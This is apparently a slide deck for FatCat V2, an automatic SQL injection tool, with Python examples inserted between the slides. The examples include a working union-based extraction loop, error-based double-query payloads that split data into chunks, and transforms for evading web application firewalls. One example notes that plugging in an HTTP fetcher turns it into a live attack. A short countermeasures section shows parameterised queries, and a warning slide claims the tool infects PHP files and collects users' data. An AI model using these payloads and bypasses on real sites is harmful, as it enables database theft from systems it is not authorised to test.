FatCat V2 – Automatic Web [S]QL-Injector


Sandeep Kamble AKA [S]
     Parason INC

                           Blog : http://sandeepkamble.com
                                      Twitter: @SandeepL337
# /usr/bin/whoami
• Narcissistic Vulnerability Pimp (aka security researcher for fun)

• Listed on the Google, Facebook, Twitter, Dropbox, Cloudflare, 500px,
  Lynda.com and Central Desktop security pages.

• Ahhh? What are those vulnerabilities?

• Member of Garage4hackers.com; you can find the PoCs @G4h.
Index

    • Introducing FatCat Beta 2
    • SQL injection in brief
    • FatCat ingredients
         1) DB information & server information gathering
         2) Normal (union-based) SQL injection
         3) Error-based SQL injection
         4) WAF (Web Application Firewall) bypass functions
             • C-style MySQL comment WAF bypass
             • "Buffer overflow" WAF bypass
             • CRLF WAF bypass
             • Bypass with information_schema.statistics
             • Bypass with information_schema.key_column_usage
         5) Countermeasures
         6) Demo
Good Advice for Good People
     Warning! FatCat is used for security research. All PHP files will be
     infected and all your data will be collected. If you want to be safe,
     don't use this tool. If you do, don't send sensitive information. If
     after all that you still continue, you do so at your own risk.
Ladies and gentlemen, introducing
FatCat V2
  1) It's new, it's cool to use, inject the web!
  2) Normal (union-based) SQL injection
  3) Error-based SQL injection
  4) WAF (Web Application Firewall) bypass functions
  5) Helpful to pentesters: you can create a PoC from anywhere.
  6) Supports MySQL 5.0
  7) Developed in PHP
  8) FatCat has 3400+ downloads on code.google.com
SQL injection in brief
                            "SQL injection happens when a user manipulates
                             input that is used to form a SQL query."

            (cartoon: "It's me .. Hi, :/", attacker sending payload !@#$%^&*())
FatCat Ingredients
 1) DB information & server information gathering
 2) Normal (union-based) SQL injection
 3) Error-based SQL injection
 4) WAF (Web Application Firewall) bypass functions
FatCat Ingredients
1) DB information & server information gathering
      Using MySQL functions and system variables, DB & server information can be gathered:
   1. Finding the total column count
       • ORDER BY n: raise n until the query errors; the largest n that still works is the column count
   2. Finding the MySQL version
       • VERSION() function
   3. Finding the current user
       • USER() function
   4. Finding the data directory
       • @@datadir system variable
   5. Finding the base directory
       • @@basedir system variable
   6. Finding the host name
       • @@hostname system variable
   7. Finding the operating system
       • @@version_compile_os system variable
   8. Finding the current database name
       • DATABASE() function
   9. Max allowed packet size
       • @@max_allowed_packet system variable
FatCat Ingredients
2) Normal SQL injection
   • Also known as union-based SQL injection
   • UNION combines the result sets of two SELECT statements (both must return the same number of columns)
   • Eg: id=-2+union+select+13371,13372,13373,13374-- -
     (id=-2 matches no real row, so only the injected row is rendered; 13371, 13372, ... are
     markers that reveal which column the page echoes)
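The information-gathering steps and the union payload above, carried through end to end as an added example (this is not FatCat's own code). A constructed in-memory SQLite table stands in for the MySQL backend, and `vulnerable_page()` builds its query by string concatenation the way an injectable PHP page would. SQLite has no `VERSION()`, `USER()` or `@@datadir`, so the probes use `sqlite_version()` and `sqlite_master` instead; against MySQL you would substitute the probe list from the slide. The `<<`/`>>` delimiters and the `page` callback are assumptions of this example.

```python
import re
import sqlite3

# Added example, not FatCat's code. A constructed in-memory SQLite table stands
# in for the MySQL backend, and vulnerable_page() rebuilds the query by string
# concatenation the way an injectable PHP page does. SQLite has no VERSION(),
# USER() or @@datadir, so sqlite_version() and sqlite_master are probed instead;
# against MySQL the probe list is the one on the slide (VERSION(), USER(),
# @@datadir, DATABASE(), ...). FatCat's real HTTP handling is not reproduced.
_db = sqlite3.connect(":memory:")
_db.executescript("""
    CREATE TABLE news(id INTEGER, title TEXT, body TEXT);
    INSERT INTO news VALUES (1, 'Hello', 'first post');
    INSERT INTO news VALUES (2, 'World', 'second post');
""")


def vulnerable_page(id_param: str) -> str:
    """Render ?id=<id_param>; DB errors are echoed, like PHP with display_errors=On."""
    sql = "SELECT id, title, body FROM news WHERE id=" + id_param  # injectable
    try:
        rows = _db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "SQL error: " + str(exc)
    return "\n".join(" | ".join(str(col) for col in row) for row in rows)


def find_column_count(page, max_cols: int = 20) -> int:
    """Slide step 1: ORDER BY 1, 2, ... n. The first n that errors means the
    query has n-1 columns (MySQL: "Unknown column 'n' in 'order clause'")."""
    for n in range(1, max_cols + 1):
        if page(f"1 ORDER BY {n}-- -").startswith("SQL error"):
            return n - 1
    raise RuntimeError("column count not found")


MARKER = 13371  # FatCat-style numeric markers 13371, 13372, ..., one per column


def union_payload(ncols: int, slot: int = -1, expr: str = "") -> str:
    """-2 UNION SELECT 13371,13372,... with one slot optionally replaced by expr.
    id=-2 matches no real row, so only the injected row is rendered."""
    cells = [str(MARKER + i) for i in range(ncols)]
    if expr:
        # Fixed delimiters make the value easy to pull out of the HTML.
        # SQLite concatenates with ||; in MySQL this is concat('<<',expr,'>>').
        cells[slot] = f"'<<'||({expr})||'>>'"
    return "-2 UNION SELECT " + ",".join(cells) + "-- -"


def find_reflected_slot(page, ncols: int) -> int:
    """Inject the bare markers and see which column the page actually echoes."""
    body = page(union_payload(ncols))
    for i in range(ncols):
        if str(MARKER + i) in body:
            return i
    raise RuntimeError("no marker reflected in the page")


def extract(page, expr: str) -> str:
    """Whole union-based round: count columns, find a visible slot, inject, parse."""
    ncols = find_column_count(page)
    slot = find_reflected_slot(page, ncols)
    body = page(union_payload(ncols, slot, expr))
    match = re.search(r"<<(.*?)>>", body, re.S)
    if not match:
        raise RuntimeError("probe value not reflected")
    return match.group(1)


if __name__ == "__main__":
    print("columns :", find_column_count(vulnerable_page))
    print("version :", extract(vulnerable_page, "sqlite_version()"))
    print("tables  :", extract(vulnerable_page,
                               "(SELECT group_concat(name) FROM sqlite_master WHERE type='table')"))
```

The `page` argument is whatever fetches a response for a given `id` value; swapping the in-memory stand-in for a function that performs the HTTP request turns this into the same loop the tool runs, with the marker step telling you which of the union columns is actually visible before you spend a request on a real probe.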
FatCat Ingredients
3) Error-based SQL injection
    • Also known as double-query SQL injection
    • Sometimes union-based SQLi fails; then you can use error-based SQLi
    • A query that confuses the DB engine and produces helpful MySQL errors
    • Eg: select gmailid,(select password from id where id=9) as Google_India from id;
                                                                 Aww..! Double query

             Duplicate entry '~Clubhack_screte~1' for key 1

            (cartoon: sending payload !@#$W00T%^&*(); screenshot: FatCat web interface)
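The slide shows the subquery form and the resulting `Duplicate entry '~...~1'` error, but not the payload that produced it. As an added example (not FatCat's code), the block below uses the standard MySQL construction for that error, `count(*)` with `floor(rand(0)*2)` inside a `GROUP BY`, and parses the leaked value back out of a page that echoes the error. `SAMPLE_RESPONSE` is a constructed page, not output captured from the tool, and the 32-character slice width is a choice made here.

```python
import re

# Added example, not FatCat's code. The slide shows the subquery ("double query")
# form and the resulting "Duplicate entry '~...~1'" error but not the payload that
# produced it; this block uses the standard MySQL construction for that error
# (count(*) + floor(rand(0)*2) + GROUP BY) and parses the value back out.
# SAMPLE_RESPONSE is a constructed page, not output captured from the tool.


def double_query_payload(expr: str) -> str:
    """Suffix for a numeric injection point, e.g. ?id=1<payload>.

    The inner SELECT groups information_schema.tables by
    x = '~' + expr + '~' + floor(rand(0)*2). rand(0) is seeded, so its sequence
    (0,1,1,0,...) is fixed and the GROUP BY temp table sees the same key twice;
    MySQL aborts with "Duplicate entry '~<value>~1' for key ..." and the value
    rides out inside the error text.
    """
    return (
        " and (select 1 from (select count(*),"
        f"concat(0x7e,({expr}),0x7e,floor(rand(0)*2))x "   # 0x7e is '~'
        "from information_schema.tables group by x)a)-- -"
    )


def chunked_payloads(expr: str, total_len: int, width: int = 32) -> list:
    """The duplicate-entry message shows only the first 64 characters of the key,
    so longer values (group_concat(table_name), a password hash) are read in
    mid() slices; width 32 is this example's choice."""
    return [double_query_payload(f"mid(({expr}),{start},{width})")
            for start in range(1, total_len + 1, width)]


_DUP_ENTRY = re.compile(r"duplicate entry '~(.*?)~[01]' for key", re.I)


def parse_duplicate_entry(response: str):
    """Return the leaked value if the page echoed the MySQL error, else None."""
    match = _DUP_ENTRY.search(response)
    return match.group(1) if match else None


# Constructed page: what a PHP script that prints mysql_error() would send back.
SAMPLE_RESPONSE = """<html><body><h1>News</h1>
<b>Error:</b> Duplicate entry '~5.5.20-log~1' for key 'group_key'
</body></html>"""

if __name__ == "__main__":
    print(double_query_payload("version()"))
    print("leaked:", parse_duplicate_entry(SAMPLE_RESPONSE))
    for payload in chunked_payloads("group_concat(table_name)", 96):
        print(payload)
```

The `~` delimiters are what let the parser find the value regardless of how the page wraps the error, and the `[01]` suffix absorbs whichever `rand(0)` value ended up on the colliding key. Nothing here requires the page to render query results, which is why this route works where the union payload does not.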
FatCat Ingredients
4) WAF (Web Application Firewall) bypass?

   What a WAF offers:
   1. Protection against the OWASP Top Ten
   2. A list of vulnerability types it can prevent
   3. Brute-force protection

In simple language, it monitors the HTTP conversation.
FatCat Ingredients
4) WAF (Web Application Firewall) bypass

      • We use the following methods to bypass a WAF:
          • C-style MySQL comment WAF bypass
          • "Buffer overflow" WAF bypass
          • CRLF WAF bypass
          • Bypass with information_schema.statistics
          • Bypass with information_schema.key_column_usage

      • Linux-based WAFs (of this list only ModSecurity is a WAF proper; AppArmor and
        Systrace are host-level MAC/syscall policy tools, and Zorp is an application-layer
        proxy firewall)
          • AppArmor
          • ModSecurity (also works under Mac OS X, Solaris and other versions of Unix)
          • Systrace
          • Zorp
FatCat Ingredients
4) WAF (Web Application Firewall) bypass

      1. MySQL comment WAF bypass
          • Syntax: /*! MySQL statement */
            (MySQL executes the body of a /*! */ comment; a filter that treats it as an
            ordinary comment never sees the keywords)
          • Example:
FatCat Ingredients
4) WAF (Web Application Firewall) bypass
   2. "Buffer overflow" WAF bypass
       • Syntax: ' AAAAAAAAAAAAAAAAAAAAAAAAAAAA MySQL statement
         (not a memory-corruption bug: the long junk prefix pushes the real statement past
         the part of the request the WAF inspects)
       • Example:
FatCat Ingredients
4) WAF (Web Application Firewall) bypass

   3. CRLF WAF bypass
      • Syntax: %0A%0D + MySQL statement + %0A%0
        (MySQL treats CR/LF as whitespace, so keywords no longer match a signature written
        with literal spaces)
      • Example:
FatCat Ingredients
4) WAF (Web Application Firewall) bypass

   4. Bypass with information_schema.key_column_usage
      (exposes table_schema, table_name and column_name for key columns when the WAF
      signatures information_schema.tables / information_schema.columns)
      • Example:
FatCat Ingredients
4) WAF (Web Application Firewall) bypass

   5. Bypass with information_schema.statistics
      (same columns, but only for indexed columns)
      • Example:
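The five bypasses above, applied in one place against a deliberately weak filter, as an added example that is not FatCat's code. `naive_waf()` is a toy written for this demo, not ModSecurity or any real product; its literal-space substring signatures and the 512-byte inspection limit are assumed weaknesses, chosen because they are exactly what the CRLF and "buffer overflow" bypasses exploit. The padding-inside-a-comment form of the buffer-overflow bypass and the `try_bypasses` helper are this example's choices.

```python
import re
import urllib.parse

# Added example, not FatCat's code: a deliberately weak signature filter plus
# the transforms named on the slides, so the effect of each bypass can be seen.
# naive_waf() is a toy written for this demo (not ModSecurity or any product);
# its literal-space signatures and the 512-byte inspection limit are assumed
# weaknesses, chosen because they are what the CRLF and "buffer overflow"
# bypasses rely on. MySQL facts used: /*! */ bodies are executed by MySQL, and
# information_schema.statistics / key_column_usage carry table_schema,
# table_name and column_name for indexed / key columns only.

_SIGNATURES = ("union select", "information_schema.tables", "information_schema.columns")
INSPECT_LIMIT = 512   # assumed: the WAF only looks at the first 512 bytes


def naive_waf(query_string: str) -> bool:
    """True = request blocked. Decodes, lower-cases, then substring-matches."""
    text = urllib.parse.unquote_plus(query_string).lower()[:INSPECT_LIMIT]
    return any(sig in text for sig in _SIGNATURES)


def mysql_comment(payload: str) -> str:
    """/*!keyword*/: MySQL executes the comment body, other parsers drop it.
    'union select' stops being contiguous, so the signature misses."""
    return re.sub(r"\b(union|select)\b", r"/*!\1*/", payload, flags=re.I)


def buffer_overflow(payload: str, pad_len: int = INSPECT_LIMIT) -> str:
    """Slide syntax: ' AAAA... <statement>. Nothing overflows; the junk just
    pushes the statement past the bytes the WAF inspects. Here the padding
    sits inside a comment so MySQL ignores it."""
    return "/*" + "A" * pad_len + "*/" + payload


def crlf(payload: str) -> str:
    """Slide syntax: %0A%0D + statement + %0A%0D. CR/LF is whitespace to MySQL
    but not to a signature written with a literal space."""
    return re.sub(r" +", "%0A%0D", payload.strip())


COLUMN_SOURCES = {
    "columns": "information_schema.columns",                     # the usual, and signatured
    "statistics": "information_schema.statistics",               # indexed columns only
    "key_column_usage": "information_schema.key_column_usage",   # PK/FK/unique columns only
}


def column_enum_payload(table: str, source: str = "columns") -> str:
    """Column enumeration for one table from the chosen information_schema view."""
    return (f"-1 union select 1,group_concat(column_name),3 from {COLUMN_SOURCES[source]} "
            f"where table_name='{table}'-- -")


def try_bypasses(payload: str) -> dict:
    """Run the plain payload and each transform through the filter; True = blocked."""
    return {
        "plain": naive_waf(payload),
        "mysql_comment": naive_waf(mysql_comment(payload)),
        "buffer_overflow": naive_waf(buffer_overflow(payload)),
        "crlf": naive_waf(crlf(payload)),
    }


if __name__ == "__main__":
    base = "-1 union select 1,version(),3-- -"
    for name, blocked in try_bypasses(base).items():
        print(f"{name:16s} blocked={blocked}")
    for src in COLUMN_SOURCES:
        probe = mysql_comment(column_enum_payload("users", src))
        print(f"{src:16s} blocked={naive_waf(probe)}")
```

The caveat a tester should keep in mind: `statistics` and `key_column_usage` only list indexed and key columns, so a column that is neither stays invisible through those views and still has to be found another way (or guessed).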
Countermeasures for SQLI
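The countermeasures slide carries no content on this page. As an added example (not from the slides), the block below puts the standard fix, parameterised queries with type validation, next to the concatenation pattern the tool exploits, and feeds both the union payload from earlier. A constructed in-memory SQLite table stands in for MySQL; with MySQL the same principle applies via prepared statements (PDO or mysqli in PHP). The table, column names and `safe_title_search` helper are this example's own.

```python
import sqlite3

# Added example, not from the FatCat slides: the standard countermeasure,
# parameterised queries plus type validation, next to the concatenation that
# FatCat exploits. An in-memory SQLite table is a constructed stand-in for the
# MySQL backend; with MySQL the same fix is a prepared statement (PDO/mysqli).
_db = sqlite3.connect(":memory:")
_db.executescript("""
    CREATE TABLE news(id INTEGER, title TEXT);
    INSERT INTO news VALUES (1, 'Hello');
    INSERT INTO news VALUES (2, 'World');
""")


def unsafe_lookup(id_param: str) -> list:
    """The injectable pattern: the attacker-controlled string becomes SQL syntax."""
    return _db.execute("SELECT id, title FROM news WHERE id=" + id_param).fetchall()


def safe_lookup(id_param: str) -> list:
    """Validate the type, then bind: the driver sends the value as data, never as SQL."""
    try:
        news_id = int(id_param)          # an id is an integer; anything else is rejected
    except ValueError:
        return []                        # reject (or log / return 400); never build SQL from it
    return _db.execute("SELECT id, title FROM news WHERE id=?", (news_id,)).fetchall()


def safe_title_search(fragment: str) -> list:
    """String parameters that cannot be type-checked are bound too, and LIKE
    wildcards are escaped so user input cannot widen the search."""
    escaped = fragment.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    return _db.execute(
        "SELECT id, title FROM news WHERE title LIKE ? ESCAPE '\\'", (f"%{escaped}%",)
    ).fetchall()


UNION_PAYLOAD = "-2 UNION SELECT 13371,13372-- -"   # the slide's union payload, 2 columns

if __name__ == "__main__":
    print("unsafe:", unsafe_lookup(UNION_PAYLOAD))   # injected marker row comes back
    print("safe:  ", safe_lookup(UNION_PAYLOAD))     # rejected: not an integer
    print("safe:  ", safe_lookup("1"))
    print("search:", safe_title_search("' OR 1=1-- "))
```

Binding is the fix; the `int()` cast in front of it is defence in depth and doubles as the place to log the attempt. Escaping alone (the `mysql_real_escape_string` habit) is not equivalent: it does nothing for a numeric context with no quotes, which is exactly the `id=-2 UNION ...` case above.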
Let's inject with FatCat
Any Questions ?

     A Gentleman never asks.
     A Lady never tells.
Thank you !




</presentation>
